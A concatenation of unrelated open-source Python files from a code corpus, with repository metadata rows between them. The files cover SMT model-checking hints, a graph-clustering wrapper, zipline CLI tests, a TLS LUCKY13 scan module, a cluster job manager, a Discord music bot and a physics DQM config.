rhs = msat_make_iff(menv, self.x_send,
msat_make_and(menv,
msat_make_equal(menv, in_c, msg_id),
msat_make_lt(menv, c, timeout)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack & send') -> (timeout' = base_timeout)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack, self.x_send))
rhs = msat_make_equal(menv, x_timeout, base_timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
class Receiver(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
loc, x_loc = self._symb("l", bool_type)
self.wait = loc
self.work = msat_make_not(menv, loc)
self.x_wait = x_loc
self.x_work = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc}
zero = msat_make_number(menv, "0")
# wait
self.init = self.wait
# delta > 0 -> loc' = loc & out_c' = out_c
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_impl(menv, lhs, rhs)
disc_t = msat_make_equal(menv, delta, zero)
# wait -> (wait' <-> in_c = out_c)
lhs = msat_make_and(menv, disc_t, self.wait)
rhs = msat_make_iff(menv, self.x_wait,
msat_make_equal(menv, in_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait & wait') -> (out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_wait))
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait & work') -> out_c' = in_c
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_work))
rhs = msat_make_equal(menv, x_out_c, in_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# work -> out_c' = out_c
lhs = msat_make_and(menv, disc_t, self.work)
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
delta = mgr.Symbol(delta_name, types.REAL)
r2s = mgr.Symbol("r2s", types.INT)
s2r = mgr.Symbol("r2s", types.INT)
s_l = mgr.Symbol("s_l", types.BOOL)
s_evt = mgr.Symbol("s_evt", types.BOOL)
s_msg_id = mgr.Symbol("s_msg_id", types.INT)
s_timeout = mgr.Symbol("s_timeout", types.REAL)
s_c = mgr.Symbol("s_c", types.REAL)
r_l = mgr.Symbol("r_l", types.BOOL)
symbs = frozenset([delta, r2s, s2r, s_l, s_evt, s_msg_id, s_timeout, s_c,
r_l])
x_delta = symb_to_next(mgr, delta)
x_r2s = symb_to_next(mgr, r2s)
x_s2r = symb_to_next(mgr, s2r)
x_s_l = symb_to_next(mgr, s_l)
x_s_evt = symb_to_next(mgr, s_evt)
x_s_msg_id = symb_to_next(mgr, s_msg_id)
x_s_timeout = symb_to_next(mgr, s_timeout)
x_s_c = symb_to_next(mgr, s_c)
x_r_l = symb_to_next(mgr, r_l)
res = []
r0 = mgr.Real(0)
r1 = mgr.Real(1)
i0 = mgr.Int(0)
i1 = mgr.Int(1)
loc0 = Location(env, mgr.Equals(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i0))
hint = Hint("h_s2r0", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_l)
loc0.set_progress(0, x_s_l)
hint = Hint("h_s_l0", env, frozenset([s_l]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(0, x_s_evt)
hint = Hint("h_s_evt0", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_msg_id, i0))
loc0.set_progress(0, mgr.Equals(x_s_msg_id, i0))
hint = Hint("h_s_msg_id0", env, frozenset([s_msg_id]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_timeout, r0))
loc0.set_progress(0, mgr.Equals(x_s_timeout, r0))
hint = Hint("h_s_timeout0", env, frozenset([s_timeout]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_c, r0))
loc0.set_progress(0, mgr.Equals(x_s_c, r0))
hint = Hint("h_s_c0", env, frozenset([s_c]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(0, x_r_l)
hint = Hint("h_r_l0", env, frozenset([r_l]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(delta, r0))
loc0.set_progress(0, mgr.Equals(x_delta, r1))
hint = Hint("h_delta1", env, frozenset([delta]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i1))
hint = Hint("h_s2r1", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_l)
loc0.set_progress(1, mgr.Not(x_s_l))
loc1 = Location(env, mgr.Not(s_l))
loc1.set_progress(0, x_s_l)
hint = Hint("h_s_l1", env, frozenset([s_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(1, mgr.Not(x_s_evt))
loc1 = Location(env, mgr.Not(s_evt))
loc1.set_progress(0, x_s_evt)
hint = Hint("h_s_evt1", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(s_timeout, r0))
loc0.set_progress(0, mgr.Equals(x_s_timeout, mgr.Plus(s_timeout, r1)))
hint = Hint("h_s_timeout1", env, frozenset([s_timeout]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s_c, r0))
loc0.set_progress(0, mgr.Equals(x_s_c, mgr.Plus(s_c, r1)))
hint = Hint("h_s_c1", env, frozenset([s_c]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(1, mgr.Not(x_r_l))
loc1 = Location(env, mgr.Not(r_l))
loc1.set_progress(0, x_r_l)
hint = Hint("h_r_l1", env, frozenset([r_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, mgr.Plus(s2r, i1)))
hint = Hint("h_s2r2", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
return frozenset(res)
| 38.277778 | 89 | 0.576627 |
dd9a967b300e22b668f2ceb25f30a107110059fa | 2,735 | py | Python | localgraphclustering/cpp/MQI_cpp.py | vishalbelsare/LocalGraphClustering | a6325350997932d548a876deb259c2387fc2c809 | [
"MIT"
] | 106 | 2017-09-06T04:47:02.000Z | 2022-03-30T07:43:27.000Z | localgraphclustering/cpp/MQI_cpp.py | pmacg/local-bipartite-clusters | d29e8d37c79e27b48e785b7b2c4bad9ea5d66b6d | [
"MIT"
] | 51 | 2017-09-06T02:22:09.000Z | 2021-12-15T11:39:28.000Z | localgraphclustering/cpp/MQI_cpp.py | vishalbelsare/LocalGraphClustering | a6325350997932d548a876deb259c2387fc2c809 | [
"MIT"
] | 38 | 2017-09-04T21:45:13.000Z | 2022-01-19T09:48:25.000Z | # A python wrapper for MQI
# ai,aj - graph in CSR
# n - number of nodes in the graph
# R - seed set
# nR - number of nodes in seed set
# actual_length - number of nodes in the optimal subset
# ret_set - optimal subset with the smallest conductance
from operator import itemgetter
import numpy as np
from numpy.ctypeslib import ndpointer
import ctypes
from .utility import determine_types, standard_types
from . import _graphlib
# Load the functions
def _setup_MQI_args(vtypestr, itypestr, fun):
float_type,vtype,itype,ctypes_vtype,ctypes_itype,bool_type = standard_types(vtypestr,itypestr)
fun.restype=ctypes_vtype
fun.argtypes=[ctypes_vtype,ctypes_vtype,
ndpointer(ctypes_itype, flags="C_CONTIGUOUS"),
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
ctypes_vtype,
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS")]
return fun
_graphlib_funs_MQI64 = _setup_MQI_args(
'int64','int64', _graphlib.MQI64)
_graphlib_funs_MQI32 = _setup_MQI_args(
'uint32','uint32', _graphlib.MQI32)
_graphlib_funs_MQI32_64 = _setup_MQI_args(
'uint32','int64', _graphlib.MQI32_64)
def _get_MQI_cpp_types_fun(ai,aj):
float_type,vtype,itype,ctypes_vtype,ctypes_itype = determine_types(ai,aj)
if (vtype, itype) == (np.int64, np.int64):
fun = _graphlib_funs_MQI64
elif (vtype, itype) == (np.uint32, np.int64):
fun = _graphlib_funs_MQI32_64
else:
fun = _graphlib_funs_MQI32
return float_type,vtype,itype,ctypes_vtype,ctypes_itype,fun
"""
def MQI_cpp(ai,aj,lib):
float_type,vtype,itype,ctypes_vtype,ctypes_itype = determine_types(ai,aj)
#lib = load_library()
if (vtype, itype) == (np.int64, np.int64):
fun = lib.MQI64
elif (vtype, itype) == (np.uint32, np.int64):
fun = lib.MQI32_64
else:
fun = lib.MQI32
#call C function
fun.restype=ctypes_vtype
fun.argtypes=[ctypes_vtype,ctypes_vtype,
ndpointer(ctypes_itype, flags="C_CONTIGUOUS"),
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
ctypes_vtype,
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS")]
return fun
"""
def MQI_cpp(n,ai,aj,nR,R):
float_type,vtype,itype,ctypes_vtype,ctypes_itype,fun = _get_MQI_cpp_types_fun(ai,aj)
R=np.array(R,dtype=vtype)
ret_set=np.zeros(nR,dtype=vtype)
actual_length=fun(n,nR,ai,aj,0,R,ret_set)
actual_set=np.empty(actual_length,dtype=vtype)
actual_set[:]=[ret_set[i] for i in range(actual_length)]
return (actual_length,actual_set) | 33.353659 | 98 | 0.684826 |
91a2481625a634c933cabb5f09c844aa355b33bc | 4,226 | py | Python | tests/test_cmdline.py | welly87/zipline | dbdfa8ed86417f954e95bd7468e144589f2cd482 | [
"Apache-2.0"
] | 38 | 2019-08-15T18:11:21.000Z | 2021-09-25T17:17:31.000Z | tests/test_cmdline.py | welly87/zipline | dbdfa8ed86417f954e95bd7468e144589f2cd482 | [
"Apache-2.0"
] | 4 | 2018-11-02T07:31:31.000Z | 2018-11-05T09:08:17.000Z | tests/test_cmdline.py | welly87/zipline | dbdfa8ed86417f954e95bd7468e144589f2cd482 | [
"Apache-2.0"
] | 15 | 2019-08-14T00:14:17.000Z | 2022-01-20T03:15:25.000Z | import zipline.__main__ as main
import zipline
from zipline.testing import ZiplineTestCase
from zipline.testing.predicates import (
assert_equal,
assert_raises_str,
)
from click.testing import CliRunner
from zipline.extensions import (
Namespace,
create_args,
parse_extension_arg,
)
class CmdLineTestCase(ZiplineTestCase):
def init_instance_fixtures(self):
super(CmdLineTestCase, self).init_instance_fixtures()
def test_parse_args(self):
n = Namespace()
arg_dict = {}
arg_list = [
'key=value',
'arg1=test1',
'arg2=test2',
'arg_3=test3',
'_arg_4_=test4',
]
for arg in arg_list:
parse_extension_arg(arg, arg_dict)
assert_equal(
arg_dict,
{
'_arg_4_': 'test4',
'arg_3': 'test3',
'arg2': 'test2',
'arg1': 'test1',
'key': 'value',
}
)
create_args(arg_list, n)
assert_equal(n.key, 'value')
assert_equal(n.arg1, 'test1')
assert_equal(n.arg2, 'test2')
assert_equal(n.arg_3, 'test3')
assert_equal(n._arg_4_, 'test4')
msg = (
"invalid extension argument '1=test3', "
"must be in key=value form"
)
with assert_raises_str(ValueError, msg):
parse_extension_arg('1=test3', {})
msg = (
"invalid extension argument 'arg4 test4', "
"must be in key=value form"
)
with assert_raises_str(ValueError, msg):
parse_extension_arg('arg4 test4', {})
msg = (
"invalid extension argument 'arg5.1=test5', "
"must be in key=value form"
)
with assert_raises_str(ValueError, msg):
parse_extension_arg('arg5.1=test5', {})
msg = (
"invalid extension argument 'arg6.6arg=test6', "
"must be in key=value form"
)
with assert_raises_str(ValueError, msg):
parse_extension_arg('arg6.6arg=test6', {})
msg = (
"invalid extension argument 'arg7.-arg7=test7', "
"must be in key=value form"
)
with assert_raises_str(ValueError, msg):
parse_extension_arg('arg7.-arg7=test7', {})
def test_parse_namespaces(self):
n = Namespace()
create_args(
[
"first.second.a=blah1",
"first.second.b=blah2",
"first.third=blah3",
"second.a=blah4",
"second.b=blah5",
],
n
)
assert_equal(n.first.second.a, 'blah1')
assert_equal(n.first.second.b, 'blah2')
assert_equal(n.first.third, 'blah3')
assert_equal(n.second.a, 'blah4')
assert_equal(n.second.b, 'blah5')
n = Namespace()
msg = "Conflicting assignments at namespace level 'second'"
with assert_raises_str(ValueError, msg):
create_args(
[
"first.second.a=blah1",
"first.second.b=blah2",
"first.second=blah3",
],
n
)
def test_user_input(self):
zipline.extension_args = Namespace()
runner = CliRunner()
result = runner.invoke(main.main, [
'-xfirst.second.a=blah1',
'-xfirst.second.b=blah2',
'-xfirst.third=blah3',
'-xsecond.a.b=blah4',
'-xsecond.b.a=blah5',
'-xa1=value1',
'-xb_=value2',
'bundles',
])
assert_equal(result.exit_code, 0) # assert successful invocation
assert_equal(zipline.extension_args.first.second.a, 'blah1')
assert_equal(zipline.extension_args.first.second.b, 'blah2')
assert_equal(zipline.extension_args.first.third, 'blah3')
assert_equal(zipline.extension_args.second.a.b, 'blah4')
assert_equal(zipline.extension_args.second.b.a, 'blah5')
assert_equal(zipline.extension_args.a1, 'value1')
assert_equal(zipline.extension_args.b_, 'value2')
| 30.402878 | 73 | 0.539991 |
7862a171b1e3b1fecc3a7ec0fe5c12d7ae659c0a | 720 | py | Python | modules/server/lucky13.py | turbostar190/tlsassistant | a3f2032cf2d1ab407c210af7069b1faef3b0a928 | [
"Apache-2.0"
] | 18 | 2019-06-13T09:19:07.000Z | 2022-03-11T07:24:50.000Z | modules/server/lucky13.py | turbostar190/tlsassistant | a3f2032cf2d1ab407c210af7069b1faef3b0a928 | [
"Apache-2.0"
] | 2 | 2019-07-25T07:10:43.000Z | 2021-07-28T12:34:38.000Z | modules/server/lucky13.py | turbostar190/tlsassistant | a3f2032cf2d1ab407c210af7069b1faef3b0a928 | [
"Apache-2.0"
] | 10 | 2019-06-21T09:29:06.000Z | 2022-03-18T07:45:52.000Z | from modules.server.testssl_base import Testssl_base
from modules.stix.stix_base import Bundled
from utils.mitigations import load_mitigation
class Lucky13(Testssl_base):
"""
Analysis of the lucky13 testssl results
"""
stix = Bundled(mitigation_object=load_mitigation("LUCKY13"))
# to override
def _set_arguments(self):
"""
Sets the arguments for the testssl command
"""
self._arguments = ["-L"]
# to override
def _worker(self, results):
"""
The worker method, which runs the testssl command
:param results: dict
:return: dict
:rtype: dict
"""
return self._obtain_results(results, ["LUCKY13"])
| 24 | 64 | 0.640278 |
a007827a7ad67827fcd1d1cc88bcc1bd2dbfddd1 | 16,033 | py | Python | qmap/manager.py | bbglab/qmap | c73c355b73995a839fc1923a3f57d3a933721bfd | [
"Apache-2.0"
] | null | null | null | qmap/manager.py | bbglab/qmap | c73c355b73995a839fc1923a3f57d3a933721bfd | [
"Apache-2.0"
] | null | null | null | qmap/manager.py | bbglab/qmap | c73c355b73995a839fc1923a3f57d3a933721bfd | [
"Apache-2.0"
] | null | null | null | """
This module contains the manager for the execution of the jobs.
The manager is in charge of providing an interface that
is used to manage the jobs and interact with them.
An execution is a set of jobs that are lunched together.
The manager should be able to handle several jobs together
(e.g. cancelling multiple jobs at once).
Additionally, one of the key features of the is
that it should be able to
keep the number of jobs that has been submitted
below certain threshold to avoid gathering all the resources
of the cluster.
"""
import os
import logging
from collections import OrderedDict
from os import path
from weakref import WeakMethod
from qmap import executor
from qmap.globals import QMapError, EXECUTION_ENV_FILE_NAME, EXECUTION_METADATA_FILE_NAME
from qmap.job import SubmittedJob, ReattachedJob, JobStatus
from qmap.job.status import VALUES as JOB_STATUS_VALUES
from qmap.profile import Profile
from qmap.file import metadata as metadata_file, env as env_file, jobs as jobs_file
logger = logging.getLogger("qmap")
class Status:
def __init__(self, jobs):
"""
Information about the status of the jobs in the execution
Args:
jobs (dict): list of IDs and jobs (see :obj:`~qmap.job.job.Job`)
Job IDs are grouped in list using the status (see :obj:`~qmap.job.status.Status`).
The reason to use lists is to keep track of the order in which they enter in each state and
be able to move them between lists.
"""
self._jobs = jobs
self.total = len(self._jobs)
self.groups = {} # Groups of jobs
self._info_string = ''
for g in JOB_STATUS_VALUES:
self.groups[g] = list()
self._info_string += '{}: {{}} '.format(g.title())
self._info_string += 'TOTAL: {}'
self._build_groups()
def _build_groups(self):
"""Set all the jobs to the corresponding groups and add a handler to notify state changes"""
for id_, job in self._jobs.items():
self.groups[job.status].append(id_)
job.state_change_handlers.append(WeakMethod(self.notify_state_change))
def update(self):
"""
Update the status of the jobs by using the cluster interface for that
(multiple jobs at once).
Only jobs with status RUN, PENDING and OTHER are updated.
"""
for status in [JobStatus.RUN, JobStatus.PENDING, JobStatus.OTHER]:
ids_to_update = self.groups[status]
jobs_to_update = {self._jobs[id_].executor_id: self._jobs[id_] for id_ in ids_to_update}
if len(jobs_to_update) > 0:
for job_id, status_ in executor.generate_jobs_status(jobs_to_update.keys()):
jobs_to_update[job_id].change_status(*status_)
def notify_state_change(self, job_id, old_status, new_status):
"""
Change a job from one list to another according to its status
Args:
job_id (str): identifier of the job
old_status (str): previous job status
new_status (str): current job status
"""
if old_status == new_status:
return
else:
self.groups[old_status].remove(job_id)
self.groups[new_status].append(job_id)
def __repr__(self):
"""Build a string using the amount of jobs in each group and the total"""
values = []
for g in JOB_STATUS_VALUES:
values.append(len(self.groups[g]))
values.append(self.total)
return self._info_string.format(*values)
class Manager:
MD_PROFILE = 'profile'
MD_MAX_RUNNING = 'running'
MD_GROUP_SIZE = 'groups'
def __init__(self, output_folder):
"""
The manager is the interface for the execution.
Args:
output_folder (str): path to the folder where to store job data
"""
self.out_folder = output_folder
self._f_metadata = path.join(self.out_folder, EXECUTION_METADATA_FILE_NAME)
self._f_env = path.join(self.out_folder, EXECUTION_ENV_FILE_NAME)
self._jobs = {}
self.max_running = None # Max running jobs at the same time (running is the sum of pending+running)
self.is_submission_enabled = True # Flag that indicates if the submission of new jobs in enabled or not
self._group_size = None # Size of the groups made
self._profile = None # Executor profile
self.status = None
def _save_metadata(self):
"""Update metadata. Should be changed if any of the values changes.
However, the only variable member is the max_running, so it is fine
if we save the metadata only when creation and close.
"""
metadata = {Manager.MD_PROFILE: dict(self._profile), Manager.MD_MAX_RUNNING: self.max_running,
Manager.MD_GROUP_SIZE: self._group_size}
metadata_file.save(self._f_metadata, metadata)
def _save_environment(self):
"""Create a store the env file from the job parameters of the profile"""
env_file.save(self._f_env, self._profile.parameters)
def get(self, id_):
"""Get a particular job"""
return self._jobs.get(id_, None)
def get_jobs(self, status=None):
"""
Args:
status (str, default None): see :obj:`~qmap.job.status.Status`
Returns:
list. List of IDs of the selected group.
If None, all job IDs are returned.
"""
if status is None:
return self._jobs.keys()
else:
return self.status.groups.get(status, None)
def close(self):
"""
Save metadata of all jobs and the manager itself.
This is a method to be called before closing the manager
Raises:
QMapError.
"""
errors = []
for id_, job in self._jobs.items():
try:
job.save_metadata()
except QMapError:
errors.append(id_)
continue
if len(errors) > 0:
raise QMapError('Error saving metadata of {}'.format(', '.join(errors)))
self._save_metadata() # The max running jobs might have changed
def submit_and_close(self):
"""Submit all UNSUBMITTED jobs for execution and call :meth:`close`"""
self.max_running = len(self._jobs)
self.update()
self.close()
def terminate(self):
"""
Cancel all jobs whose status is RUN, PENDING or OTHER
and stop the submission of new ones
"""
job_ids = [self._jobs[id].executor_id for id in self.status.groups[JobStatus.RUN]]
job_ids += [self._jobs[id].executor_id for id in self.status.groups[JobStatus.PENDING]]
job_ids += [self._jobs[id].executor_id for id in self.status.groups[JobStatus.OTHER]]
executor.terminate_jobs(job_ids)
self.is_submission_enabled = False
def resubmit_failed(self, **kwargs):
"""
Resubmit all jobs that have FAILED
Raises:
QMapError. When any job cannot be resubmitted
"""
errors = []
ids_to_resubmit = self.status.groups[JobStatus.FAILED][:] # make a copy because the list is going to be altered
for id_ in ids_to_resubmit:
try:
self._jobs[id_].resubmit(**kwargs)
except QMapError:
errors.append(id_)
continue
if len(errors) > 0:
raise QMapError('Error resubmitting {}'.format(', '.join(errors)))
def update(self):
"""
Update the status of the execution and submit UNSUBMITTED jobs
for execution if the number of RUN and PENDING jobs is lower than
the maximum permitted (which a parameter).
The submission of new jobs can be stopped/started using the
:meth:`terminate` method and :obj:`is_submission_enabled` flag.
"""
self.status.update()
unsubmitted_jobs = self.get_jobs(JobStatus.UNSUBMITTED)
if len(unsubmitted_jobs) > 0 and self.is_submission_enabled:
# Submit new jobs
running_and_pending = len(self.get_jobs(JobStatus.RUN)) + len(self.get_jobs(JobStatus.PENDING))
to_run = self.max_running - running_and_pending
if to_run > 0:
ids_to_run = unsubmitted_jobs[:to_run] # make a copy because the list is going to be altered
errors = []
for id_ in ids_to_run:
try:
job = self._jobs[id_]
job.run(self.job_params) # job can change the params object
except QMapError:
errors.append(id_)
continue
if len(errors) > 0:
raise QMapError('Error running {}'.format(', '.join(errors)))
def update_job_params(self, **kwargs):
"""Update default job parameters (do not affect specific job parameters)"""
self._profile.parameters.update(**kwargs)
self._save_environment()
@property
def is_done(self):
"""Check whether all jobs are COMPLETED or FAILED"""
completed = len(self.get_jobs(JobStatus.DONE))
failed = len(self.get_jobs(JobStatus.FAILED))
return completed + failed == len(self._jobs)
@property
def job_params(self):
"""Get default parameters for a job (using a copy)"""
return self._profile.parameters.copy()
@property
def editable_job_params(self):
"""List the parameters that are editable"""
return self._profile.get('editable_params',
OrderedDict([(k, k.title()) for k in self._profile.parameters.keys()]))
class Submitted(Manager):
def __init__(self, input_file, output_folder, profile_conf, max_running_jobs=None, group_size=None, cli_params=None):
"""
Use a jobs file to create a set of jobs for submission
Args:
input_file (str): path to file with the commands (see :func:`~qmap.file.jobs`).
output_folder (str): path where to save the job related files. It must be empty.
profile_conf (:class:`~qmap.profile.Profile`): profile configuration
max_running_jobs (int): maximum jobs that can be submitted to the cluster at once.
Defaults to all.
group_size (int): number of commands to group under the same job
cli_params (:class:`~qmap.parameters.Parameters`): configuration for the jobs received from command line
The input file is copied to the output_folder (and renamed).
"""
super().__init__(output_folder)
try:
os.makedirs(self.out_folder)
except OSError:
if os.listdir(self.out_folder): # directory not empty
raise QMapError('Output folder [{}] is not empty. '
'Please give a different folder to write the output files.'.format(self.out_folder))
self._profile = profile_conf
self._group_size = group_size
self.__load_input(input_file, cli_params)
self.max_running = len(self._jobs) if max_running_jobs is None else max_running_jobs
self._save_metadata()
self._save_environment()
self.status = Status(self._jobs)
self.update()
def __load_input(self, in_file, cli_params=None):
pre, job, post, general_parameters = jobs_file.parse(in_file)
if len(job) > int(self._profile.get('max_ungrouped', len(job)+1)) and self._group_size is None:
raise QMapError('To submit more than {} jobs, please specify the group parameter.'
'This parameter indicate the size of each group.'
'For small jobs, the bigger the group the better.'
'Please, note that the job specific _params will be ignored'.format(self._profile['max_ungrouped']))
job_parameters = self._profile.parameters # default _params
job_parameters.update(general_parameters) # global input file _params
if cli_params is not None:
job_parameters.update(cli_params) # execution command line _params
job_list = []
if self._group_size is None or self._group_size == 1:
for i, c in job.items():
cmd = c.split('##')
params = None
if len(cmd) > 1: # if the job has specific _params
params = jobs_file.parse_inline_parameters(cmd[1]) # job specific _params
job_list.append((i, SubmittedJob(i, self.out_folder, cmd[0].strip(), params, pre_commands=pre, post_commands=post)))
else:
logger.warning("Specific job execution _params ignored")
cmds_in_group = []
group_name = None
cmds_counter = 0
for i, c in job.items():
if group_name is None:
group_name = i
command = c.split('##')[0].strip()
cmds_in_group.append(command)
cmds_counter += 1
if cmds_counter >= self._group_size:
job_list.append((group_name, SubmittedJob(group_name, self.out_folder, cmds_in_group, None, pre_commands=pre, post_commands=post)))
group_name = None
cmds_in_group = []
cmds_counter = 0
else:
if len(cmds_in_group) > 0: # in case there is a remaining group
job_list.append((group_name, SubmittedJob(group_name, self.out_folder, cmds_in_group, None, pre_commands=pre, post_commands=post)))
self._jobs = OrderedDict(job_list)
jobs_file.save(in_file, self.out_folder)
class Reattached(Manager):
def __init__(self, output_folder, force=False, max_running_jobs=None):
"""
Creates and execution from a existing output folder.
Args:
output_folder (str): path to a previous execution output folder
force (bool): try to load as many jobs as possible regardless of loading errors
max_running_jobs (int): maximum jobs that can be submitted to the cluster at once.
Each job is identified by each script file.
If no jobs can be loaded a QMapError is raised.
"""
super().__init__(output_folder)
# Load metadata
metadata = metadata_file.load(self._f_metadata)
profile_conf = metadata[Manager.MD_PROFILE]
profile_conf['params'] = env_file.load(self._f_env)
self._profile = Profile(profile_conf)
self.max_running = metadata[Manager.MD_MAX_RUNNING] if max_running_jobs is None else max_running_jobs
self._group_size = metadata.get(Manager.MD_GROUP_SIZE, None)
# Load jobs
self._jobs = OrderedDict()
try:
self.__load_execution()
except QMapError as e:
if force:
logger.warning(e)
else:
raise e
self.status = Status(self._jobs)
if len(self._jobs) == 0:
raise QMapError('No jobs found in folder {}'.format(output_folder))
self.is_submission_enabled = False
self.update()
def __load_execution(self):
ids = []
for file in metadata_file.find(self.out_folder):
file_name = path.splitext(path.basename(file))[0]
if not file_name == EXECUTION_METADATA_FILE_NAME:
ids.append(file_name)
corrupt_jobs = []
for id_ in sorted(ids):
try:
self._jobs[id_] = ReattachedJob(id_, self.out_folder)
except QMapError:
corrupt_jobs.append(id_)
continue
if len(corrupt_jobs) > 0:
raise QMapError('Error loading the following jobs: {}'.format(', '.join(corrupt_jobs)))
| 37.992891 | 151 | 0.617476 |
1844cce18cc5af0272da44a6773a538ea98b2217 | 3,169 | py | Python | music_cog.py | IzzatCORP/IzzatYellowMusic | 7f7dbf3ed0fe6de003a9f53df992192cb9b29438 | [
"MIT"
] | null | null | null | music_cog.py | IzzatCORP/IzzatYellowMusic | 7f7dbf3ed0fe6de003a9f53df992192cb9b29438 | [
"MIT"
] | null | null | null | music_cog.py | IzzatCORP/IzzatYellowMusic | 7f7dbf3ed0fe6de003a9f53df992192cb9b29438 | [
"MIT"
] | null | null | null | import nextcord
from nextcord.ext import commands
from youtube_dl import YoutubeDL
class music_cog(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.is_playing = False
self.music_queue = []
self.YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist':'True'}
self.FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}
self.vc = ""
def search_yt(self, item):
with YoutubeDL(self.YDL_OPTIONS) as ydl:
try:
info = ydl.extract_info("ytsearch:%s" % item, download=False)['entries'][0]
except Exception:
return False
return {'source': info['formats'][0]['url'], 'title': info['title']}
def play_next(self):
if len(self.music_queue) > 0:
self.is_playing = True
m_url = self.music_queue[0][0]['source']
self.music_queue.pop(0)
self.vc.play(nextcord.FFmpegPCMAudio(m_url, **self.FFMPEG_OPTIONS), after=lambda e: self.play_next())
else:
self.is_playing = False
async def play_music(self):
if len(self.music_queue) > 0:
self.is_playing = True
m_url = self.music_queue[0][0]['source']
if self.vc == "" or not not self.vc.is_connected():
self.vc = await self.music_queue[0][1].connect()
else:
self.vc = await self.bot.move_to(self.music_queue[0][1])
print(self.music_queue)
self.music_queue.pop(0)
self.vc.play(nextcord.FFmpegPCMAudio(m_url, **self.FFMPEG_OPTIONS), after=lambda e: self.play_next())
else:
self.is_playing = False
@commands.command()
async def play(self, ctx, *args):
query = " ".join(args)
voice_channel = ctx.author.voice.channel
if voice_channel is None:
await ctx.send("Connect to voice channel lol")
else:
song = self.search_yt(query)
if type(song) == type(True):
await ctx.send("Could not download this song, so Incorrect format try another keyword idiot. This could be due to playlist or Live")
else:
await ctx.send("Added to Song Queue , nice")
self.music_queue.append([song, voice_channel])
if self.is_playing == False:
await self.play_music()
@commands.command()
async def queue(self, ctx):
retval = ""
for i in range(0, len(self.music_queue)):
retval += self.music_queue[i][0]['title'] + "\n"
print(retval)
if retval != "":
await ctx.send(retval)
else:
await ctx.send("No music found in queue")
@commands.command()
async def skip(self, ctx):
if self.vc != "":
self.vc.stop()
await self.play_music()
@commands.command()
async def disconnect(self, ctx):
await self.vc.disconnect() | 29.342593 | 149 | 0.547491 |
0e768228677cc5960634748c37cbdd15b69712e8 | 295 | py | Python | RecoTauTag/HLTProducers/python/TauDQM_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoTauTag/HLTProducers/python/TauDQM_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoTauTag/HLTProducers/python/TauDQM_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
TauDQM = cms.EDProducer("DQMTauProducer",
TrackIsoJets = cms.InputTag("hltL25TauConeIsolation"),
SignalCone = cms.double(0.15),
